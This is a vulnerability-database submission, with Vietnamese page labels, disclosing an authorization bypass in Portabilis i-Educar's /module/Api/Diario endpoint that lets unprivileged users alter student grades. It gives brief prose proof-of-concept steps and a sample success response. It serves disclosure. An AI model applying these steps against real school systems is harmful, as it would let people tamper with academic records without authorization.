Gửi #625917: Portabilis i-Educar 2.10.0 Authorization Bypassthông tin

tiêu đềPortabilis i-Educar 2.10.0 Authorization Bypass
Mô tảBroken Function Level Authorization (BFLA) allows unauthorized users to alter student grades Summary An API endpoint in i-Educar 2.9.0 is vulnerable to Broken Function Level Authorization (BFLA). An unauthorized user is able to modify student grades by directly accessing the /module/Api/Diario endpoint, bypassing permission controls. This leads to severe integrity issues, where anyone with access to the API format can tamper with academic records. Details The endpoint /module/Api/Diario does not enforce proper authorization checks to validate whether the calling user has the right to alter student grades. Even a user without any profile or assigned permissions can successfully submit a request and change the grades of students in the system. There is no validation of session roles or associated permissions before executing sensitive academic actions. PoC 1 - Create a new user with no privileges. 2 - Prepare a request to the /module/Api/Diario endpoint with the data to submit a student grade, using the low privillege user cookie then send the request. Print:https://github.com/CVE-Hunters/CVE/blob/main/images/bfla002.png?raw=true Observe the results: { "oper": "post", "resource": "grades", "msgs": [{ "msg": "Grades successfully posted!", "type": "success" }], "any_error_msg": false } Impact This is a Broken Function Level Authorization (BFLA) vulnerability, as categorized by OWASP API Security Top 10 (2023) - API4. The consequences include: Tampering with academic data without authorization. Loss of data integrity in school records. Potential legal and reputational damage for educational institutions.
Nguồn⚠️ https://github.com/CVE-Hunters/CVE/blob/main/i-educar/Broken%20Function%20Level%20Authorization%20(BFLA)%20allows%20unauthorized%20users%20to%20alter%20student%20grades.md
Người dùng
 nmmorette (UID 87361)
Đệ trình31/07/2025 01:02 (cách đây 9 các tháng)
Kiểm duyệt09/08/2025 07:11 (9 days later)
Trạng tháiđược chấp nhận
Mục VulDB319317 [Portabilis i-Educar đến 2.9.0 API Endpoint /module/Api/Diario nâng cao đặc quyền]
điểm20

TrướcTổng QuanTiếp theo

Want to know what is going to be exploited?

We predict KEV entries!